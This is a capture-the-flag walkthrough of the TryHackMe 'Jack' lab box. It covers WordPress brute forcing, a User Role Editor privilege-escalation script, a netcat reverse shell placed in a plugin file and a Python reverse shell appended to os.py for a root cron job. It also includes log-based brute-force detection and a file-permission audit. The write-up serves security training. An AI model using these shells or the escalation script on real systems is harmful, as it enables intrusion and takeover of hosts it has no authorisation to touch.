# TryHackMe - Jack

![Jack](/files/-M7EKYrg1QGl-WvLe6fd)

## Getting Root

1. We start by enumerating the box and notice that it is running WordPress. Using the **wpscan** tool we enumerate users and then obtain a valid set of credentials by **brute-forcing** the login.
2. To get a **reverse shell** we escalate our privileges from a normal user to administrator on WordPress, then edit a plugin's **php** file and inject our **reverse shell code**.
3. After getting a **reverse shell** as user **www-data**, we find the **id\_rsa** ssh key of **jack** in a backup directory that anyone on the box can read.
4. After enumerating the box with **linpeas.sh**, we notice a **cron** job run by root that executes a script importing the Python **os** module, a module to which we have read and write access.
5. We append a reverse shell to the **os** module and get a shell as root.

## Tools Used:

**`nmap, wpscan, Burp, pspy`**

## Nmap

![](/files/-M7ENw0Zl99QDMUhx-Xp)

```bash
# nmap -A  10.10.186.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 14:55 EDT
Nmap scan report for jack.thm (10.10.186.74)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack&#039;s Personal Site &#8211; Blog for Jacks writing adven...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds

```

## Enumeration

There is a note saying we should add **jack.thm** to `/etc/hosts`:

![](/files/-M7EPu0SxLXZuYmDdkQ9)

Edit your `/etc/hosts` file and add:

```
10.10.186.74    jack.thm
```

### **Port 80 - WordPress**

**Visiting the site**

![](/files/-M7ER2YIuabeRfGalBY_)

From the **nmap** results we can see **`/wp-admin/`** listed in `robots.txt`; it takes us to the WordPress login form, but we don't have any credentials yet.

![](/files/-M7ES1CX6t5p6wV8Uw6G)

### Using WPScan

I used the following command to enumerate users.

```
wpscan --url jack.thm -e u
```

Users Found:

![](/files/-M7ETJ7inefu0hGAg8mT)

We create a file named **users.txt** containing those usernames. Now we can try to brute-force the WordPress login and see if we get lucky.

Use **`-h`** to get help for **wpscan**; briefly, **`-U`** is the file with the users, **`-P`** is the password wordlist I used, and **`--url`** points it at the target.

```
wpscan -U users.txt -P /usr/share/wordlists/fasttrack.txt --url jack.thm
```

After a few minutes we get the password for **wendy** and can log in successfully.

![](/files/-M7EUtc0WRXfQIKStwF8)

![](/files/-M7EVHy2t57luR3lCGB8)
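From the defender's side, the brute force above leaves a dense run of POST requests to `wp-login.php` in the Apache access log. The script below is an added example, not part of the original writeup: it parses combined-format log lines and flags any source IP that sends at least a threshold number of login POSTs inside a sliding window. The log lines it runs on are constructed for the example (the attacker address reuses the one from this writeup), and it also counts POSTs to `xmlrpc.php`, because wpscan prefers XML-RPC `system.multicall` when it is enabled, which packs many guesses into a single request.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# wpscan attacks wp-login.php directly, or xmlrpc.php (system.multicall) when
# XML-RPC is enabled, so count POSTs to both.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]          # drop any query string
    return m["ip"], ts, m["method"], path, int(m["status"])


def find_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map each source IP to the largest number of login POSTs it made within
    any `window`, keeping only IPs that reach `threshold`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and path in LOGIN_PATHS:
            attempts[ip].append(ts)

    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):          # two-pointer sliding window
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def constructed_log():
    """Constructed sample: twelve rapid login POSTs from the attacker address
    used in this writeup, plus one normal login from another host."""
    fmt = "%d/%b/%Y:%H:%M:%S -0400"
    base = datetime(2020, 5, 13, 14, 58, 0)
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=3 * i)).strftime(fmt)
        lines.append(f'10.11.7.188 - - [{ts}] "POST /wp-login.php HTTP/1.1" 200 2901 "-" "Mozilla/5.0"')
    ts = base.strftime(fmt)
    lines.append(f'10.10.10.5 - - [{ts}] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append(f'10.10.10.5 - - [{ts}] "GET /wp-admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, n in find_login_bruteforce(constructed_log()).items():
        print(f"{ip}: {n} login POSTs within 60s")
```

The status code is deliberately not used as a filter: a failed `wp-login.php` attempt returns 200 and so does an XML-RPC multicall, so the signal is the rate of POSTs per source, not the response.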

## **Exploitation**

After logging into the dashboard there is not much a low-privileged user can do to get a reverse shell. However, there is a known privilege escalation in the **User Role Editor** plugin that lets us grant ourselves the administrator role, and an administrator can edit plugin code, which should give us code execution.

[Exploit-DB 44595](https://www.exploit-db.com/exploits/44595)

You can use **metasploit**, but we are going to do it manually.

The first thing we need to do is start **Burp Suite** and intercept the requests. Then we go to **Profile**.

![](/files/-M7Eck2QLvR37JPJgIfi)

Click **Update Profile**

![](/files/-M7Ed7-w8_JvayfqcGBW)

The request will look as follows

![](/files/-M7EdP9bHRSU8KgaEwT4)

Add the following to the request body (our change was inserted just before `&action`; the position is irrelevant to PHP, only the presence of the `ure_other_roles` parameter matters, and because we are editing the browser's own request the nonce it already carries stays valid):

```
&ure_other_roles=administrator&
```

The edited request should look like this

![](/files/-M7EdsPBCh2_TKYQJamL)

Then click **Forward** so Burp sends the edited request; your dashboard should now show the administrator menus:

![](/files/-M7Edyv5-SpRSkpOkROK)
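The same edit can be made without Burp. The script below is an added example, not part of the original writeup or the Exploit-DB entry: it logs in as the low-privileged user with Python's standard library, fetches the profile form so the replayed request carries a valid `_wpnonce`, and re-submits every field of that form with `ure_other_roles=administrator` inserted before `action`, exactly as done by hand above. The WordPress field names it relies on (`log`, `pwd`, `testcookie`, `_wpnonce`, `action=update`) are those of a standard install and should be compared against your own capture, and the profile HTML it is tested on is a constructed snippet, not a capture from the box.

```python
import http.cookiejar
import re
import sys
import urllib.parse
import urllib.request

INPUT_RE = re.compile(r"<input\b[^>]*>", re.I)
ATTR_RE = re.compile(r'\b(\w+)="([^"]*)"')


def form_fields(html):
    """Collect (name, value) pairs from every <input> on the page in document
    order, skipping unchecked checkboxes/radios so the replay matches what a
    browser would submit. The _wpnonce hidden field comes along for free."""
    fields = []
    for tag in INPUT_RE.findall(html):
        attrs = dict(ATTR_RE.findall(tag))
        name = attrs.get("name")
        if not name:
            continue
        if attrs.get("type", "").lower() in ("checkbox", "radio") and "checked" not in tag:
            continue
        fields.append((name, attrs.get("value", "")))
    return fields


def inject_role(fields, role="administrator"):
    """Insert ure_other_roles=<role> just before the action field, mirroring
    the Burp edit above; PHP would accept it anywhere in the body."""
    out, done = [], False
    for name, value in fields:
        if name == "action" and not done:
            out.append(("ure_other_roles", role))
            done = True
        out.append((name, value))
    if not done:
        out.append(("ure_other_roles", role))
    return out


def build_body(fields):
    """URL-encode the field list as application/x-www-form-urlencoded."""
    return urllib.parse.urlencode(fields)


def escalate(base_url, username, password, role="administrator"):
    """Log in, fetch /wp-admin/profile.php, replay the form with the extra role.
    Returns the HTTP status of the profile update."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    opener.open(base_url + "/wp-login.php")           # sets wordpress_test_cookie
    login = build_body([("log", username), ("pwd", password), ("wp-submit", "Log In"),
                        ("testcookie", "1"), ("redirect_to", base_url + "/wp-admin/")])
    opener.open(base_url + "/wp-login.php", login.encode())
    if not any(c.name.startswith("wordpress_logged_in") for c in jar):
        raise RuntimeError("login failed: no wordpress_logged_in cookie")
    html = opener.open(base_url + "/wp-admin/profile.php").read().decode("utf-8", "replace")
    body = build_body(inject_role(form_fields(html), role))
    return opener.open(base_url + "/wp-admin/profile.php", body.encode()).status


# Constructed stand-in for the relevant part of the profile page (not a real capture).
SAMPLE_PROFILE_HTML = """
<form id="your-profile" method="post" action="profile.php">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="5a6f1b2c3d" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/profile.php" />
<input type="text" name="nickname" id="nickname" value="wendy" />
<input type="checkbox" name="comment_shortcuts" value="true" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user_id" value="2" />
<input type="submit" name="submit" value="Update Profile" />
</form>
"""

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} http://jack.thm USER PASS")
    print(escalate(*sys.argv[1:]))
```

Replaying the whole form rather than a hand-picked subset is what keeps the request valid: WordPress rejects the update if the nonce is missing or if required fields such as the e-mail address are dropped, which is the usual reason a scripted version of this exploit fails while the Burp edit works.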

## Getting a Shell

Go to Plugin Editor

![](/files/-M7Eiki_F58sCCcTG10f)

You will be prompted with a warning telling you that you should not edit plugins directly. Click "**I understand**".

![](/files/-M7EixrB6lI6IMwHFjAn)

Now we add our code to one of the plugin files; once that plugin is activated the code runs and should give us a reverse shell.

![](/files/-M7EjyDtobvyh-q2YoLH)

We are going to use the following command, executed from the edited plugin file, to get our reverse shell (replace the IP and port with your own listener):

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.7.188 9001 >/tmp/f
```

![](/files/-M7EtIsXzRlIVsBpIRh7)

Click on **Update File**

![](/files/-M7EuJhPJspnnVdq8_tz)

### Triggering the code and getting a shell

#### We start our listener

```bash
# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
```

We go to **Installed Plugins** and click **Activate**

![](/files/-M7EvN50u44uMdubv6FA)

And, we get a shell

![](/files/-M7Ew1oW-7GnrZKxcfC2)

To get a proper interactive shell, use the following steps:

```bash
# In the reverse shell: spawn a pty, then press Ctrl-Z to background it
$ /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z

# In the attacker console: note the rows/columns reported by stty -a,
# then switch the terminal to raw mode and bring the shell back
stty -a
stty raw -echo
fg

# Back in the reverse shell: fix the terminal and set the size noted above
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```

## Privilege Escalation

We can get the **user flag** and continue enumerating.

```bash
www-data@jack:/home/jack$ ls -la
total 40
drwxr-xr-x 4 jack jack 4096 May 13 13:24 .
drwxr-xr-x 3 root root 4096 Jan  8 11:21 ..
lrwxrwxrwx 1 jack jack    9 Jan 10 09:29 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 Jan  8 11:21 .bash_logout
-rw-r--r-- 1 jack jack 3771 Jan  8 11:21 .bashrc
drwx------ 2 jack jack 4096 Jan  9 09:57 .cache
-rw-r--r-- 1 jack jack  655 Jan  8 11:21 .profile
drwx------ 2 jack jack 4096 Jan 10 18:33 .ssh
-rw------- 1 jack jack 1820 May 13 13:24 .viminfo
-rw-r--r-- 1 root root  140 Jan 10 15:08 reminder.txt
-rw-rw-r-- 1 jack jack   33 Jan 10 09:33 user.txt
www-data@jack:/home/jack$ ls -l
total 8
-rw-r--r-- 1 root root 140 Jan 10 15:08 reminder.txt
-rw-rw-r-- 1 jack jack  33 Jan 10 09:33 user.txt
```

Checking the **`reminder.txt`** file, we notice a reference to backups, so we enumerate further and find a **backups** folder containing an ssh key we can use to log in as **jack**.

```bash
www-data@jack:/home/jack$ cat reminder.txt

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

www-data@jack:/home/jack$
```

We search for a directory whose name starts with **backup** and find one under **`/var`**:

```bash
# Quote the pattern so the shell does not expand it before find sees it
www-data@jack:/home/jack$ find / -type d -name 'backup*' 2>/dev/null
/var/backups

# Checking the backups directory
www-data@jack:/home/jack$ ls -ld /var/backups
drwxr-xr-x 2 root root 4096 Jan 10 15:05 /var/backups
```

List of files under **`/var/backups`**

![](/files/-M7F71q7AjsIgxUQk4lh)

The fact that **www-data** can read the key at all is the permissions mistake the memo refers to. After copying the **id\_rsa** to our machine and restricting it to **600** (ssh refuses a private key that is readable by other users), we can log in as user **jack** with `-i`:

```bash
chmod 600 id_rsa
```

![](/files/-M7F9eD7YCNjB5P6-ogI)

Using **pspy** to monitor running processes, we notice that **root** has a **cron job** running every minute. The script is located at **`/opt/statuscheck/checker.py`**.

![](/files/-M7F04VQmrw-O4sVe4QM)

The contents of the script show that it imports the Python module **os**:

![](/files/-M7FBLEy0iG30X3p6jbv)

With all that information it's time for some further enumeration. We notice that the user **jack** is a member of the **family group**, which has **write** access to the files under the **`/usr/lib/python2.7/`** directory. This matters because the **os** module lives in that directory, so **jack** can modify the exact module that the root cron job imports.

```bash
# Checking the user jack
www-data@jack:/home/jack$ id jack
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)
```

![](/files/-M7FCFc9-BXzpeLrD6S7)
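Both weaknesses on this box, the private key that **www-data** could read under `/var/backups` and the `os.py` that the **family** group could write, are the same class of mistake: file modes evaluated for the wrong principal. The script below is an added example, not code from the original writeup: given a uid and a set of gids, it reports private-key files that user could read under a directory, and modules a script imports whose `.py` file (or containing directory) that user could overwrite, which generalises the `os.py` hijack used next. It runs against a constructed temporary fixture that mirrors the box rather than against real system files; paths such as `python2.7/os.py` and `checker.py` are stand-ins created by the example.

```python
import os
import re
import stat
import tempfile

def _permitted(st, uid, gids, ubit, gbit, obit):
    """One permission class as the kernel evaluates it for a non-root user:
    owner bits if we own the file, else group bits if its group is one of
    ours, else the 'other' bits. Parent-directory execute bits are ignored."""
    if st.st_uid == uid:
        return bool(st.st_mode & ubit)
    if st.st_gid in gids:
        return bool(st.st_mode & gbit)
    return bool(st.st_mode & obit)

def readable_by(st, uid, gids):
    return _permitted(st, uid, gids, stat.S_IRUSR, stat.S_IRGRP, stat.S_IROTH)

def writable_by(st, uid, gids):
    return _permitted(st, uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)

KEY_MARKER = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")

def exposed_private_keys(root, uid, gids):
    """Regular files under root that look like private keys and that a user
    with this uid/gids could read (the /var/backups mistake in reminder.txt)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if not stat.S_ISREG(st.st_mode) or not readable_by(st, uid, gids):
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(64)
            except OSError:
                continue
            if KEY_MARKER.search(head):
                hits.append(path)
    return sorted(hits)

IMPORT_RE = re.compile(r"^\s*(?:import\s+([\w.]+)|from\s+([\w.]+)\s+import)", re.M)

def writable_imports(script, search_path, uid, gids):
    """Modules the script imports whose .py file, or its directory, that user
    could change: the os.py hijack used below, generalised. Only plain
    top-level modules are resolved; the first search_path hit wins as in sys.path."""
    with open(script) as fh:
        src = fh.read()
    hits = []
    for m in IMPORT_RE.finditer(src):
        mod = (m.group(1) or m.group(2)).split(".")[0]
        for d in search_path:
            path = os.path.join(d, mod + ".py")
            try:
                st = os.stat(path)
            except OSError:
                continue
            if writable_by(st, uid, gids) or writable_by(os.stat(d), uid, gids):
                hits.append((mod, path))
            break
    return hits

def run_demo():
    """Constructed fixture (not files from the box): a 0644 id_rsa next to a
    0600 one, a group-writable os.py on the module path, and a checker.py
    importing os. Checked as uid 99999, which owns nothing here, with and
    without membership of the files' group (jack's 'family' situation)."""
    uid, out = 99999, {}
    with tempfile.TemporaryDirectory() as root:
        backups, lib = os.path.join(root, "backups"), os.path.join(root, "python2.7")
        for d in (backups, lib):
            os.mkdir(d)
            os.chmod(d, 0o755)
        for name, mode in (("id_rsa", 0o644), ("id_rsa_locked", 0o600)):
            with open(os.path.join(backups, name), "wb") as fh:
                fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nconstructed\n")
            os.chmod(os.path.join(backups, name), mode)
        osmod = os.path.join(lib, "os.py")
        with open(osmod, "w") as fh:
            fh.write("# stand-in for /usr/lib/python2.7/os.py\n")
        os.chmod(osmod, 0o664)
        script = os.path.join(root, "checker.py")
        with open(script, "w") as fh:
            fh.write("import os\nimport json\n")
        gid = os.stat(osmod).st_gid
        out["keys_other"] = [os.path.basename(p) for p in exposed_private_keys(backups, uid, set())]
        out["imports_group"] = [m for m, _ in writable_imports(script, [lib], uid, {gid})]
        out["imports_other"] = [m for m, _ in writable_imports(script, [lib], uid, set())]
    return out

if __name__ == "__main__":
    print(run_demo())
```

On a real host you would call `exposed_private_keys("/var/backups", uid, gids)` and `writable_imports("/opt/statuscheck/checker.py", ["/usr/lib/python2.7"], uid, gids)` with the uid and gids from `id jack`; the directory check matters because a writable directory lets a user replace a read-only module by renaming over it.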

To exploit this, we edit the **`/usr/lib/python2.7/os.py`** module and append the following reverse shell at the very end. Note that every Python 2 process that imports **os** will now try to connect back, not only the cron job, so remove the addition once you have your root shell.

```python
# Appended to /usr/lib/python2.7/os.py. The bare dup2() works only because
# this code runs inside the os module itself, where `from posix import *`
# has already brought dup2 into the namespace; in a standalone script it
# would be os.dup2().
import socket
import pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.11.7.188", 9008))   # attacker IP and listener port
dup2(s.fileno(), 0)                # stdin
dup2(s.fileno(), 1)                # stdout
dup2(s.fileno(), 2)                # stderr
pty.spawn("/bin/bash")
```

We start a listener, wait up to a minute for the cron job to run, and get a root shell.

```bash
Ncat: Listening on :::9008
Ncat: Listening on 0.0.0.0:9008
Ncat: Connection from 10.10.186.74.
Ncat: Connection from 10.10.186.74:57942.
root@jack:~# id
id
uid=0(root) gid=0(root) groups=0(root)
```

